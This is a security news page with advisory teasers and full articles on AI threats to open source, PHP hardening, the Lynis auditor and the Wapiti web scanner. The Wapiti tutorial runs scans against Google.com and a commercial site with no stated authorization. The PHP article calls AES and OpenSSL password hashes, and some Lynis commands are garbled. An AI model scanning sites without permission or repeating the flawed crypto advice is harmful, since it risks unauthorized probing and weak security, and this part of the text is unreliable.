Stay Ahead With Linux Security Features
security advisory important The compromise of Nx Console shows how much infrastructure now sits behind a single developer account. GitHub repositories, CI/CD pipelines, container build systems, Terraform projects, Kubernetes deployments. None of those systems was the initial target. The workstation was. . Attackers did not need a Linux privilege escalation bug or a remote code execution chain. They needed developers to trust a tool they were already using. For many organizations, that was enough. What Happened? Federal...
Jun 03, 2026
security advisory open-source You remove the malware. You rotate the compromised credentials. You patch the original vulnerability and close the ticket. Two weeks later, the attacker is back. . What happened? You didn't lose the battle at the exploit; you lost it at the cleanup. In many modern Linux intrusions, the malware you found wasn't the main problem—it was the fallback mechanisms left behind. These hooks quietly restore attacker access the moment you look away. If you clean a host but miss these persistence layers,...
Jun 02, 2026
security advisory Red Hat Researchers investigating a campaign now tracked as Miasma found that more than 30 packages in Red Hat's @redhat-cloud-services npm namespace had been altered to deliver credential-stealing malware. . The packages weren't being used to deploy ransomware or sabotage systems. From what has been reported so far, the objective appears to have been much simpler: collect credentials from developer environments and use that access elsewhere. GitHub tokens, cloud credentials, SSH keys, and other...
Jun 02, 2026
cloud security security monitoring Linux rootkits are old, but they never really disappeared. They just stopped attracting the same attention. . Most malware wants to execute and spread. A rootkit wants to stay invisible long enough that nobody notices the compromise until the damage is already done, and on Linux systems, that still works more often than many teams are comfortable admitting. That difference matters because modern infrastructure runs heavily on Linux underneath. Cloud workloads, ESXi hosts, telecom appliances,...
Jun 01, 2026
access control open-source A production Linux server gets rebuilt from an old image. A contractor leaves. A CI/CD job is retired. Months later, the same SSH public keys are still sitting in authorized_keys, silently trusted by root or a service account nobody owns anymore. . That is how SSH key sprawl usually happens. It rarely stems from one obvious failure. Instead, it accumulates through years of small access decisions that never expire. For attackers, those forgotten keys are not clutter; they represent silent SSH...
May 27, 2026
Refine features
X Clear Filters
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Loading...
Explore Latest Linux Security features
We found 1 articles for you...
102
threat detectionsecurity auditAI threatExploring AI Risks and Detection Solutions in Linux Open Source Software
It’s hard to think of a technology more impactful than Artificial Intelligence (AI) . While it’s been around for a while, it’s only recently broken into the mainstream. Now that it has, it’s rewriting the playbook for much of the tech industry, especially open-source software (OSS). . In particular, advancements in Large Language Models (LLMs) are revolutionizing the way we approach cybersecurity in OSS, introducing both new challenges and groundbreaking solutions. As exciting as this new technological age can seem, it’s not without downsides . AI is a tool, so whether its impact is good or bad depends on how people use it and which custom generative AI development services your company will choose. As you might expect, cybercriminals haven’t taken long to take advantage of this immense opportunity. Conversely, you can use open-source AI tools to fight against these threats and improve security in Linux environments. Let's take a loser look at the impact - both positive and negative - that advancements in AI are having on open-source security. AI-Driven Security Threats Targeting Open-Source Ecosystems AI-driven threats are cause for concern in any context, but open-source platforms are sometimes uniquely vulnerable. Over the past two years, attacks against the OSS supply chain grew by almost 280% . You can’t blame AI for all this, but it likely played a role. For instance, AI models can be used to automate and increase the complexity of security attacks. LLMs, like GPT-3, can craft sophisticated phishing schemes and malicious code, increasing the risk of contributor spoofing and prompt injection attacks. Open AI tools make it easier than ever to develop advanced threats. Given how much the world relies on OSS, open repositories make ideal targets for these attacks. Here’s a closer look at a few of the most common AI-driven threats amid this trend. Contributor Spoofing The collaborative nature of OSS makes it particularly prone to spoofing attacks.While you don’t need AI to impersonate a trusted contributor and inject backdoors into open-source code, generative models make it much easier. Security researchers have proven tools like GPT-3 can craft more effective phishing attacks than humans, even when the victims are cybersecurity pros. The danger here for OSS is criminals can use AI to spoof contributor profiles. Once they do that, they can add malicious code into otherwise secure open repositories that can be difficult to detect. OSS’s collaboration also means spotting these attacks is more accessible, but that doesn’t always work out how you’d hope. You may remember how Linux narrowly avoided a massive security breach after a contributor found a backdoor that had gone unnoticed by many people for far too long. It’s unclear if this backdoor was the product of AI, and, thankfully, someone caught it before it caused any damage. But the incident is a chilling reminder of what such an attack could do. As AI makes it harder to catch malicious code and contributors, backdoors like this could become increasingly common. Prompt Injection AI prompt injection is a similar threat facing open-source environments. Interestingly, these attacks both use AI and target it. With the help of code-generating AI tools, cybercriminals can create malicious prompts that affect an open-source model’s output. While that’s possible without automation, using it boosts their chances of injecting something the target AI and its contributors can’t detect. Prompt injection and data poisoning attacks have been a concern for almost as long as machine learning has been around. The industry’s move toward open-source models could make this threat all the more prominent. A whopping 80% of IT leaders plan to use more open-source tools in their AI projects. That trend makes open machine learning models a more promising target for prompt injection attacks. A single successful incident could affect multiple companies’ AI applications, and theseinjections will get more complicated to spot as generative AI makes it easier to ramp up their complexity. As LLMs and AI tools become more advanced, the threat of prompt injection continues to grow. Cybercriminals can misuse open-source AI to influence the behavior of machine learning models, making it crucial to ensure the integrity of models used in OSS. AI technology on the defensive side has also improved. You can use tools like Recon-ng and others in the OSINT Framework to scour the web for information on developing trends and found vulnerabilities. Using these proactive monitoring tools to stay ahead of evolving attacks can help you spot malicious code or compromised AI models before you deploy them. Over-Reliance on AI Coding Tools How open-source contributors use AI can pose some risks, too. One of the most exciting use cases for AI in OSS is automated coding. With open AI tools to write and check code, you can develop apps in much less time, but over-relying on these technologies could leave you vulnerable. For all of AI’s strengths, it’s not as good at programming as a human expert. That becomes a more significant concern if you take its output at face value and assume it’s giving you solid, safe code. What if you automate a few lines of code, don’t double-check it, and plug it into your software only to find it contains some glaring holes? While automated coding tools powered by LLMs can accelerate development, they can also introduce vulnerabilities if not rigorously tested. Research has shown that 40% of code generated by some AI tools had vulnerabilities, highlighting the need for human oversight. These concerns aren’t just hypothetical. A recent study found 40% of the code from one popular generative tool contained flaws or bugs that make it vulnerable to attack. These models have improved since then, but they’re still imperfect. The solution here is to be cautious about AI-generated code, always double-checking it before using it. AI analysis tools canhelp find vulnerabilities, too. However, these security gaps could become more common as people become more comfortable with automation. How Can I Leverage Open-Source AI Tools for Threat Detection on Linux? AI-driven threats are likely more than a passing trend. Almost nine in 10 security experts expect them to remain relevant for the foreseeable future. It’s time for the open-source community to take AI threats seriously, which means fighting fire with fire. Open-Source Threat Detection Tools Today While opening software development to everyone can create risks related to backdoors and malicious code injection, you can develop effective security solutions faster. The community has already done a great job matching cybercriminals’ use of AI with AI-driven security. As a result, you have plenty of open-source AI threat detection tools to choose from today. One of the most popular open-source AI frameworks — TensorFlow — has extensive threat detection applications. Because this platform is so well-liked, it gets a lot of attention from the security community. You can find plenty of threat detection models and how-to guides on TensorFlow to enable AI-driven vulnerability management tools in your Linux environment. Additionally, tools like LangChain , built on LLMs, simplify debugging and executing security models. These tools help developers analyze security systems' inputs and outputs, ensuring that threats are identified and mitigated effectively and efficiently. Apache Metron was another popular open-source AI threat detection platform, though Apache has since retired it. However, some alternatives have taken its place. Some devs working on Metron-based tools transitioned their work to release similar but improved solutions like Seimbol and HELK. Deploying These Tools Effectively These tools let you spot and contain threats faster and more accurately than you could do alone. That’s a crucial advantage as attacks against Linux and other OSS applications rise.Remember, any tool requires proper usage to reach its full potential. Deploying AI threat detection tools effectively starts with choosing the right one. Given the threat of contributor spoofing and prompt injection, you should only use platforms from trusted developers with plenty of ongoing community support. Choosing one from a library you’re already familiar with is also best. Doing so helps avoid the human errors that play a role in 95% of cybersecurity incidents today. As with all open-source platforms, you should emphasize the configuration and testing stages. Test and test again until you’re certain you’ve set these tools up correctly and their code doesn’t contain vulnerabilities. Smarter Security, Smarter Code: When Linux Meets Coding AI Security in Linux is quietly changing, and not because of louder threats but subtler ones. Open-source systems now face new risks as AI quietly learns how to spoof contributors or sneak in prompt injections—code that looks harmless can hide real danger. Yet alongside threats, there's hope. Projects like TensorFlow and LangChain already underpin powerful OSS defences—frameworks that help detect anomalies, trace suspicious behavior, and keep systems honest. In the same vein, the latest wave of developer-focused AI is reshaping how teams work: whether you're asking agents to write and check code or automate reviews, tools like Lindy, Replit, and GitHub Copilot have woven themselves into everyday workflows—light, responsive, and always listening. It’s an unfolding story—one where Linux admins and developers share the narrative, learning to trust AI without losing control. How Can I Utilize AI to Strengthen Linux Security Auditing? Similarly, you can use open-source AI to perform ongoing Linux security audits. These are important because you probably won’t create an impenetrable system on your first try, and threats always change. Like with threat detection, there are plenty of OSS solutions to automate security auditing. Oneoption is Lynis , which has been around since 2007 , and supports Linux and Unix-based operating systems. It also performs specific tests depending on the components it discovers, so it’ll automatically scale up and adapt to perform a comprehensive scan as your environment changes. OpenSCAP is another option. This tool pulls information from vulnerability databases to keep up with emerging threat trends. It also lets you configure it to meet specific regulatory standards, so it’s a great alternative if compliance is a more pressing issue for your applications. Once again, be sure to think about how you use these tools. Always match security auditing solutions to your existing OSS framework and ensure you configure them correctly before relying on them. Stay involved in their communities to catch word of necessary patches as soon as people discover them. Advancement of AI-Powered Network Security in Linux Network security is another area where AI can improve Linux security. Linux network intrusion monitors have been around for a while, but as AI has grown, these platforms have become more reliable. Take Zeek, for instance, which first appeared as “Bro” in the 90s. Since then, more than 10,000 deployments , 3,000 tracked network events, and 240 community-provided packages have pushed it to become a powerful, comprehensive network traffic analysis tool. You can also find more specific intrusion detection tools today. One great option is Suricata, which can automatically detect protocols, traffic anomalies, and policy violations to streamline network detection and response. Paid options like Snort sometimes offer further benefits, such as automatic traffic debugging. AI and LLMs aren't only beneficial for threat detection but also for proactive security measures. For example, integrating AI with Network Intrusion Detection Systems (NIDS) improves their capability to spot anomalies in real-time. Open-source initiatives like Suricata and Zeek continue to evolve with AI, offeringrobust solutions for network security on Linux. Regardless of your chosen solution, these AI-driven tools help you detect network threats faster. You can stop breaches before they cause too much damage and minimize the related costs. Open-Source AI Frameworks for Security Incident Response Of course, detecting a potential breach is just the first step. You also need to respond to these alerts to ensure the safety of your Linux systems. Thankfully, open-source AI frameworks can streamline and improve this process, too. While it’s possible to respond to events manually, the rise of AI-based threats means you’ll likely have to deal with much higher incident volumes. In fact, 75% of security pros say they’ve noticed an uptick in attacks, and 85% say generative AI is to blame. AI response management tools streamline operations enough so you can keep up with this spike. One of the most popular solutions is to use Sigma rules to look for anomalies in your event logs. You can build your own OSS solution to apply Sigma or use an off-the-shelf app from an existing community. The Hive Project’s Cortex is one popular solution. Cortex analyzes observables like IP addresses, domain names, and hashes to classify potential threats in one process instead of running multiple programs. That gives you more time to respond to threats instead of letting an attack spread as you try to figure out what it is. Our Final Thoughts: Open-source Security Must Adapt to AI AI is here to stay. That can both help and hinder open-source solutions in terms of cybersecurity. On one hand, attacks are more common and sophisticated than ever before. On the other, you have more powerful tools at your disposal to stop them. Cybercriminals are already using AI to target OSS. It’s now up to the good guys to match them and use the same technology to build stronger defenses. . The integration of AI in Linux systems is transforming organizational security, addressing threats and challenges with adaptive,intelligent solutions for protection. AI Threats, Open Source Security, Linux Threat Detection, OSS Security Tools, Security Audits. . Brittany Day
Feb 10, 2025
•
102
network securityweb applicationphp securityEnhance PHP Security: Best Practices and Mitigation Strategies
Organizations classify Hypertext Preprocessors (PHPs) as the most popular programming language since some of the biggest Internet names use the service in their businesses. PHPs help companies build websites, create applications, and manage their systems. . Although PHP is a powerful language that permits companies to explore their online potential, PHP is not the most secure option available, leaving organizations at risk of cloud security breaches, attacks, and other issues that could destroy a business’s reputation. Fortunately, there are solutions you can implement to strengthen your PHPs against any network security threat. This article will explain PHP’s relevance today, application pentesting , and best practices to utilize when mitigating attacks. How Do Companies Use PHP for Security? Is It Still Relevant? PHPs can still be helpful in security, as they can be relevant when appropriately used to determine what risks you might have in your system. Companies identify cybersecurity vulnerabilities using application pentesting software to simulate attacks in network security through the system. This type of privacy sandboxing can find flaws in company coding that could permit threat actors to take over websites and compromise sensitive data. This solution can find insecure coding, misconfigured settings, broken authentication controls, and information leaks. You can mitigate data and network security issues straightaway when using PHPs to combat hackers. If you're planning to hire dedicated PHP developer teams, ensure they follow these secure coding practices. What Insecurities Do PHP Web Applications Have? Some PHPs have Content Management Systems (CMS) built into the server as an extra level of protection in your system. To strengthen a company, PHPs implement CMS options like WordPress, Joomla, Magento, and Drupal. However, these services sometimes harbor cybersecurity vulnerabilities that allow cybercriminals to bypass security when you use this product. WordPress has networksecurity issues that have increased vulnerabilities from seventy-four to eighty-three percent in just about a year. Fortunately, organizations consistently seek to improve the security posture options they provide to users to ensure they are safe to utilize for users. How Can Application Pentesting Benefit Businesses? As the name suggests, application pentesting focuses on identifying cybersecurity vulnerabilities in your web applications by inspecting your server for necessary patching in cybersecurity. Pentesting can find flaws in coding that could permit attackers to breach your system and steal credentials or data. With this privacy sandboxing technique, you can learn about misconfigurations, broken authentications, access control weaknesses, information leaks, and more within your company. Once you know the risk, you can remediate these exploits in cybersecurity before threat actors get their hands on them. What PHP Best Practices Should I Employ to Strengthen Security? 1. Always use the latest version of PHP Use the latest PHP version since it will be up-to-date with the latest security news so your company can have the features it needs to strengthen online security. 2. Properly configure the PHP.ini file and other requisites Here is how you can tailor your system to your needs by starting with these configurations: session.save_path session.cookie_path (e.g. /var/www/mysite) session.cookie_domain After configuring those settings properly, there are a couple other settings you can edit to keep your PHP application secure. Let's take a look at the checklist below: expose_php = Off This restricts the disclosure of PHP version from being sent in HTTP Headers. When enabled, expose_php tells everyone that PHP is installed on that specific server or system, which includes the PHP version within the HTTP header, e.g (Powered by: PHP/8.1.2). You can do this for any system and works well if you are using nginx. allow_url_include=Off Setting thisto off prevents remote code execution attacks. display_errors = Off This displays whether errors should be printed on the screen to everyone visiting the site. This should be disabled as a best security practice. session.cookie_httponly = 1 Setting this to 1 disables access to cookies via Javascript APIs but use this with caution as you could break something session.use_strict_mode = 1 Setting this to 1 prevents session fixation attacks session.cookie_secure = 1 This requires cookies to strictly transmitted over HTTPS only session.cookie_samesite = Strict Setting this to strict prevents cross-origin attacks session.use_trans_sid = 0 This is not needed so set it to zero session.sid_length = 128 Here, we are setting the length of the session string which prevents brute force attacks session.sid_bits_per_character = 6 This increases the randomness of the session string which also prevents brute force attack file_uploads=off Here, we are disabling file uploads. If anyone needs to upload files, you can set a limit on the size of the files by doing upload_max_filesize = 1M 3. Use up-to-date code dependencies and third-party components, and update your web server! Update your web server to implement up-to-date code dependencies and third-party components, so your cloud security frameworks utilize newly obtained knowledge to prevent exploits in cybersecurity vulnerabilities. If you use Apache Web Server, keep it updated, turn on error logging, add firewalls, set HTTP limits, and only stay active modules. Install mod_evasive, which will maintain running servers even when attacked. An SSL certificate can provide data and network security in online communication. 4. Do not store passwords using reversible encryption Avoid storing passwords with reversible encryption that attackers can easily crack and decrypt for attackers to spy on and track youractivities. Hackers can also enumerate all other passwords if you have a static decryption key. Hash passwords with algorithms like bcrypt, AES, Open SSL, and Argon2. These options are less vulnerable to attacks in network security, making them better password-storing options that will protect your server from data theft issues. 5. Don’t rely on cookies for security Encrypt cookies before relying on them for security since cookies cannot protect login credentials and sensitive data alone. Use network security toolkits like Halite (by Libsodium), OpenSSL, or AES 256-bit with CBC mode encryption to prevent hacking. 6. Validate user input Only process PHP codes once you validate the user input so PHPs can verify forms, URL parameters, and JSON payloads with filter_var() options like the one below. Utilize this coding to prevent Cross-Site Scripting (XSS) and other malicious attacks. function is_valid_email($email = "") { return filter_var(trim($email), FILTER_VALIDATE_EMAIL); } 7. Perform regular security audits Perform web and cloud security audits to identify web application security vulnerabilities so you can utilize security patching to fix them before an attack. Such audits can improve response times and provide more reliable application performances. These web and cloud security scanners can check for Cross-Site Scripting Vulnerabilities (XSS), Cross-Site Request Forgery Vulnerabilities (CSRF), SQL Injections, PHP Code Injection, Cookie Denial of Service Attacks, and Timing Attacks. 8. Use PHP Libraries Use PHP Libraries so your developers can secure applications better for functionality. Consider the following coding options for preparing your server. Final Thoughts on PHP Security Having a PHP in your server is vital to ensuring robust data and network security. Threat actors like to take advantage of exploits in cybersecurity left behind by poor configurations,so be sure to follow the best php cybersecurity practices we discussed here so you can improve your security posture. Regularly perform web and cloud security audits to identify PHP security issues before they become a substantial risk. Incorporating AI-driven security strategies are becoming increasingly important in the proactive identification and mitigation of sophisticated cyber threats, which PHP applications may also need to consider in their ever-evolving security protocols. . Strengthen PHP applications against network security threats with best practices, pentesting solutions, and expert tips.. organizations, classify, hypertext, preprocessors, (phps), popular, programming, language, since. . Brian Gomez
May 09, 2023
•
102
system hardeningsoftware managementsecurity auditLynis: Installation Guide and Security Assessment Overview
running processes, configuration files, and more to determine what areas throughout a system need fixing to improve security posture. Such tools even offer information on how to go about such adjustments. . Lynis is an open-source auditing tool that performs extensive system health scans that support system hardening and compliance testing. Lynis supports Unix-based Operating Systems (OS), like Linux, and oversees a system for general information, vulnerable software packages, and configuration issues. This tool can detect cybersecurity vulnerabilities and provide in-depth auditing for continuous improvement, unlike other auditing tools that do not offer such information. The Lynis auditing tool assists with configuration, asset, and software patch management, as well as system hardening, pentesting , and intrusion detection. Lynis hopes to reach audiences, including system administrators, auditors, security officers, pen-testers, and security professionals, who may need help deploying hardening for web application security vulnerabilities, running daily scans for network security threats, demonstrating how to adjust security patching, and locating exploits in cybersecurity. This article will discuss Lynis installation, how to run the auditing tool and read reports, and the various testing options available through the service. Auditing Steps Lynis scans systems in a modular and opportunistic way by testing found components. Scans and audits will be more extensive if Lynis finds more, though network security toolkits do not need installation for Lynis to complete a scan. The nine steps to Lynis audits are as follows: Initializing Performing basic checks Determining Linux Operating System and tools Searching for available software components Checking the latest Lynis version Running enabled plug-ins Testing security in each category Executing your custom tests (optional) Reporting the status of the security scan to the user “lynis.log” will store all informationonce found. A separate file, “lynis-report.dat,” contains suggestions and warnings. Installation & Running First, install Lynis and start with the following codes: sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys C80E383C3DE9F082E01391A0366C67DE91CA5D5F sudo apt install apt-transport-https echo "deb stable main" | sudo tee /etc/apt/sources.list.d/cisofy-lynis.list apt update apt install lynis Lynis show version The last code lets you know how upgraded Lynis is before using it on your system. To code Lynis for running, perform the following codes: cd lynis /lynis lynis audit system “/lynis” will ask you to pick an auditing option, and “lynis audit system” will execute the checks through your entire system. Here are a few other options to choose from: lynis audit system remote lynis audit dockerfile lynis --forensics lynis --pentest Remote security scan Analyze docker files Forensics on running/mounted system Pentesting Furthermore, you can set up cronjobs to run daily scans with these codes: crontab -e 30 22 * * * root /path/to/lynis -c -Q --auditor "automated" --cronjob This code will run scans at 10:30 P.M., outputting results to “lynis.log” About the Reports Once an audit is complete, Lynis will prevent multiple outputs: Result : This could state “ok” or “warning,” “found” or “not found,” and “none” or “done” based on what command you run and the outcome of that coding. Log File : You can see the action/event times, why a test failed or skipped, internal test outpost, configuration suggestions, and threat impact scores. Report File : Information and data Lynis gathers gets produced here so you can see remarks, sections, and options/values. Lynis generates details on package installations, Debian plug-inscans, and system boot and services so that you know what network security issues exist in your system. Lynis is thorough, even presenting other test and scan results such as the following: printers and spools, software messaging and firewalls, insecure services, SSH support, SNMP support, databases, LDAP services, kernel, memory, and processes, kernel hardening , users, groups and authentication, shells, file systems, file permissions, and more. When reading screen outputs, understand the colors, which make reading the files simpler: Green: Your system is exemplary, and any issues are disabled. Yellow: Lynis skipped a test, didn’t find a scan, or has a suggestion. Red: Somewhere in your system needs attention and is unsafe. Each section can expand the color to see the network security threat and how to mitigate cybersecurity vulnerabilities. Click on the "show details" command to get suggestions to improve security posture. Other Lynis Options Custom Tests You can choose particular tests to run on Lynis with the command “lynis show tests.” See all the options available on your OS and their descriptions to pick the best ones for the network security issues you are scanning for. Then input these commands: lynis show tests /lynis update info /var/log/lynis.lo cat /var/log/lynis.log | grep KRNL OR ./lynis -c -Q. ./lynis –tests “ These options allow you to figure out what test you want, how long it takes to run the scan, and how to set up test IDs. Lynis with Categories If you want to avoid using test IDs, run category tests. For example, type this for firewalls: ./lynis --tests-from-category “firewalls”. Our Final Thoughts on Lynis Keep your system secure and up to date using these auditing network security toolkits to ensure your system is healthy. Lynis is the best option, offering comprehensive auditing and improvement suggestions. The detailed reports cover everything in the system,making it easier to know system health and what categories need your attention. Lynis is easy to install and understand, as reports have color coding and various scanning options. Run Lynis with plug-ins and customize your scans so you stay updated on the latest cybersecurity vulnerabilities and data and network security issues . Do you use an auditing tool to maintain the health of your systems? If not, try out Lynis! We’d love to hear your thoughts - connect with us on X @lnxsec , and let’s discuss! . Lynis conducts rigorous assessments of system integrity to bolster protection measures and elevate compliance protocols.. open Source Auditing Tool, Security Checks, System Scans, Network Threat Detection, Software Management. . Zaid AlBukhari
Dec 19, 2022
•
102
application securitySQL injectionsecurity testingProtect Your Websites With Wapiti: A Comprehensive Security Audit
Globally, there are roughly 30,000 web-based cyberattacks daily, primarily targeting smaller businesses and smaller websites. To put it into perspective, that is an estimated 1 cyberattack every 3 seconds that targets websites specifically. . Cybercriminals will not hesitate to attack your website, so how can you possibly find any security issues and entry points? The answer is simple: Website Vulnerability Scanners. Follow along with us as we take a look at what a Vulnerability Scanner is and how we use WAPITI Web Scanner to test some websites. What is a Website Vulnerability Scanner? Do YOU Need It? Before we get into WAPITI Scanner, let's define a Website vulnerability and how a Website Vulnerability Scanner can help you. A website vulnerability is a flaw or vulnerability in the code of a website or web application that allows cybercriminals to gain control of the site and possibly even the web hosting server. Cybercriminals have gone so far as to write scripts that scrape the web for specific platforms in search of familiar and publicized vulnerabilities that they can exploit to steal information, access confidential documents or data, spam the site, or even inject scripts. If these attacks are successful, cybercriminals can cause irreparable damage to a business's hardware and public image, as well as raise questions about whether that company has the resources to keep their data secure, as well as the data of potential future clients. Understanding and preventing website vulnerabilities is especially important for any business or corporate institution that maintains or plans to maintain a website or web application. A website vulnerability scanner is designed to look for these security flaws in a website. It searches for flaws in web services and web servers. Because cybercriminals are quick to exploit these vulnerabilities, you should be implementing regular use of a web scanner as well. Routine web vulnerability testing will allow you to patch security flaws before cyber attackers canmanipulate them. These scanners simply examine the application's code for web flaws like SQL injections, cross-site scripting (XSS), and path traversal. Wapiti Scanner: Brief Description Wapiti gives you the ability to audit the security of your web apps. It performs "black-box" scans, which means it does not examine the application's source code but instead scans the deployed web app's webpages for scripts and forms into which it can inject data. Wapiti then acts like a fuzzer, injecting payloads to see if a script is vulnerable. Watch: Wapiti Web Vulnerability Scanner - Review + Test Wapiti Features Main Scanning Features: SQL Injections (Error based, boolean-based, time-based) and XPath Injections SQL Injection is a type of injection attack that makes it possible to execute malicious SQL statements that can control a database server behind web applications. Attackers can use SQL Injection vulnerabilities to bypass application security measures. Scanning for SQLi vulnerabilities is a must to make sure that important information is not accessed and to furthermore, be able to reinforce your server to mitigate SQL injection attacks. XPath injections are attacks where malicious user input can be used to grant unauthorized access or reveal sensitive information such as XML document structure and content. These attacks are carried out by making the user's input be used in the construction of the query string. XPath Injection scans check how your server handles malicious XPath queries. If the scan does not return information on vulnerabilities, it will be considered secure. Cross-Site Scripting (XSS) reflected and permanent Cross-site scripting targets an application's users by injecting code, usually a client-side script such as JavaScript, into a web application's output. The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the attacker. XSS allows attackers to execute scripts in the victim's browser which can hijack usersessions, deface websites or redirect the user to malicious sites. Cross-Site Request Forgery (CSRF) basic detection Cross-Site Request Forgery is a malicious attack where a user is tricked into performing an action he or she didn't intend to do. A third-party website will send a request to a web application that a user is already authenticated against (e.g. their bank). The attacker can then access functionality via the victim's already authenticated browser. Targets include web applications like social media, in browser email clients, online banking, and web interfaces for network devices. CRLF Injection CRLF injection attacks are one of several types of injection attacks. It can be used to extend more malicious attacks such as cross-site scripting, page injection, cache poisoning, and cache-based tampering. A CRLF injection attack occurs when Cyber Criminals are able to inject CRLF characters into a web application. The most common use for CRLF injection attacks is log poisoning, where the Cyber Criminal forges log file entries which ultimately, can be used to hide other attacks or confuse system administrators. Although CRLF isn’t amongst the most commonly known web vulnerabilities, it is still a big threat. Due to the fact that CRLF injections are used to hide and escalate possibly stronger and potentially more dangerous attacks, it is best to use a scanner to help mitigate the exploitation of this vulnerability. XXE (Xml eXternal Entity) injection An XML External Entity attack is an attack that abuses a widely available but rarely used feature of XML parsers. Using XXE, Cyber Criminals are able to cause Denial of Service attacks on top of being able to access local and remote content and services. XXE can be used to perform Server Side Request Forgery forcing the web application to make requests to other applications. Furthermore, XXE may even enable port scanning and lead to remote code execution. There are two types of XXE attacks: in-band and out-of-band. Cyber Criminals can use XMLentities to cause a denial of service by embedding entities within entities within entities. Other Scanning Features: File disclosure detection (local and remote include, require, fopen, readfile...) Command Execution detection (eval(), system(), passtru()) Search for potentially dangerous files on the server Bypass of weak htaccess configurations Search for copies (backup) of scripts on the server Shellshock Folder and file enumeration Server Side Request Forgery Open Redirects Detection of uncommon HTTP methods Basic CSP Evaluator Brute Force login form Checking HTTP security headers Checking cookie security flags Fingerprinting of web applications using the Wappalyzer database Enumeration of Wordpress and Drupal modules Subdomain takeovers detection Log4Shell (CVE-2021-44228) detection Wapiti supports both GET and POST HTTP methods for attacks. It also supports multipart and can inject payloads in filenames. Furthermore, Wapiti displays a warning when an anomaly is found which makes the difference between permanent and reflected XSS vulnerabilities. How to Install Wapiti for Linux Distributions: With root permission, update the apt database with apt-get using the command: root@server:~# apt-get update Kali Linux and Ubuntu Installation: root@kali:~# apt-get install wapiti Debian Installation: root@debian:~# apt -y install wapiti UNIX-like Systems Installation: Prerequisites: Packages must be updated and Python must be installed. Run the command apt-get install python3 OR apt-get install python Let's grab the most recent Wapiti tar file from their page using this command below: root@kali:~# wget githubusercontent Lets extract the tar file from our download using this command below: root@kali:~# tar -xzvf wapiti3-3.1.2.tar.gz Extracting the tar file will create a directory in the directory in which you downloaded and extracted the tar file. Below, lets change to that directory using the cdcommand: root@kali:~# cd wapiti3-3.1.2/ We should now be in the wapiti3-3.1.2 directory. If we run the ls command, we should see the contents of the directory: root@kali:~/wapiti3-3.1.2# ls Bin INSTALL.md MANIFEST.in README.rst setup.py wapiti3.egg-info Doc LICENSE PKG-INFO setup.cfg VERSION wapitiCore We should now be able to install Wapiti by running the command python3 setup.py install just like below: root@server:~/wapiti3-3.1.2# python3 setup.py install Wapiti Help: For this instance, I used Kali Linux. Run the command wapiti -h to pull up a list of arguments that wapiti accepts. Wapiti in Action: For this instance, I will be using Kali Linux. Let’s use Wapiti to test Two sites, one that is generally considered secure and one that is vulnerable. Run the command below, substituting the proper url: root@kali:~# wapiti -v2 -u https://monsterhost.com/promo/ Google.com Test: For this example, we ran this command against Google . This is what wapiti will output: As you can see in the example above, we ran wapiti in verbose mode and it generated a report in html format. We use open /path/to/file to open the html file in a web browser. Below is what that looks likes: From this generated report, we see that we have a possible vulnerability with Content Security Policy Configuration. As you can see, the issue is with our CSP which helps mitigate and detect attacks such as XSS. Keep following along below to see the solution wapiti returns: The solution above is provided by wapiti. Rather than a solution, it is more of a highly recommended suggestion that you can choose to heed or not. Configuring our CSP would allow for better deterrence of attacks. HTTP Flag Cookie: In the image above, we also see that we receive a vulnerability with the HTTPOnly Flag cookie. The HttpOnly flag is not set to true in this instance. Setting it to true will help mitigate the risk of client side scripts accessing protected cookies. Secure Headers Error: In the image above, we also see that we receive a vulnerability stating it is an HTTP Secure Headers Error. Modern browsers support many HTTP headers that can improve web application security to protect against clickjacking, cross-site scripting, and other common attacks. Wapiti refers to some links that will help in hardening your web applications. Mutillidae Test: For this example, we ran this command against Mutillidae, a deliberately vulnerable web application. Whilst running, wapiti will show you real-time the tests it is running like below: In the image above, whilst wapiti was running tests, it found an XSS Vulnerability. In the image below, it found a SSRF vulnerability: When wapiti is all finished with its scans, this is what it will output: As you can see in the example above, we ran wapiti in verbose mode and it generated a report in html format. We use open /path/to/file to open the html file in a web browser. Below is what that looks like: From this generated report, we see that we have possible vulnerabilities with Content Security Policy Configuration. As you can see, the issue is with our CSP which helps mitigate and detect attacks such as XSS. Keep following along below to see the solution wapiti returns: The solution above is provided by wapiti. Rather than a solution, it is more of a highly recommended suggestion that you can choose to heed or not. The CSP is not set; configuring our CSP would allow for better deterrence of attacks. Path Traversal: A path traversal vulnerability allows Cyber Criminals to access files on your web server to which they should not have access. They do this by tricking either the web server or the web application running on it into returning files that exist outside of the web root folder. Using code access policies and chrooted jails along with using file path code to prevent users from entering the full path, we can fix thesen vulnerabilities. HTTPOnly Flag Cookie: In the image above,we also see that we receive a vulnerability with the HTTPOnly Flag cookie. The HttpOnly flag is not set to true in this instance. Setting it to true will help mitigate the risk of client-side scripts accessing protected cookies as shown in the solution below: Secure Headers Error: In the image above, we also see that we receive a vulnerability stating it is an HTTP Secure Headers Error. Modern browsers support many HTTP headers that can improve web application security to protect against clickjacking, cross-site scripting, and other common attacks. Wapiti refers to some links that will help in hardening your web applications like below: SQL Injection (SQLi): SQL injection attacks allow CyberCriminals to spoof identity, tamper with existing data, destroy the data or make it otherwise unavailable, and possibly, even become administrators of the database server. Scanning for possible SQLi vulnerabilities will help prevent your database from possibly taking over. As you can see above, Wapiti even provides us with a solution: User input must not directly be embedded in SQL statements. Instead, user input must be escaped or filtered or parameterized statements must be used. Depending on the company, getting this information to the proper team is essential to get it resolved. Server Side Request Forgery (SSRF): Solution: SSRF allows attackers to carry out scans and collect information about internal networks. Once an attacker has gained access to the server, they can use this information to compromise other servers within the network. Quite a few breaches within the past couple years such as Capital One and MS Exchange have all included SSRF attacks. SSRF vulnerabilities allow CyberCriminals to send requests from the back-end server of the web application and they do this to target internal systems that are behind firewalls and are not accessible externally. Scanning against SSRF will aide in mitigating these attacks and hopefully, keeping your system secure. Wapiti provides uswith a solution as shown above. The more frequently you scan, the closer we are to avoiding another Capital One-like instance. Cross-Site Scripting (XSS): Solution: Cross-site scripting works by manipulating a vulnerable website so that it returns malicious JavaScript to users. Cybercriminals can fully compromise users interaction with web applications by executing this malicious Javascript code/scripts. The way to ensure that you, your users, and your web app are safe is to ensure that the application does checking and validation of headers, cookies, query string, forms, and hidden field. Moreover, encoding user output can help mitigate these types of attacks. Wapiti Summary Wapiti is a well-known tool that is widely used amongst security researchers, regular users, and even System Administrators. As Cyber Criminals continue to 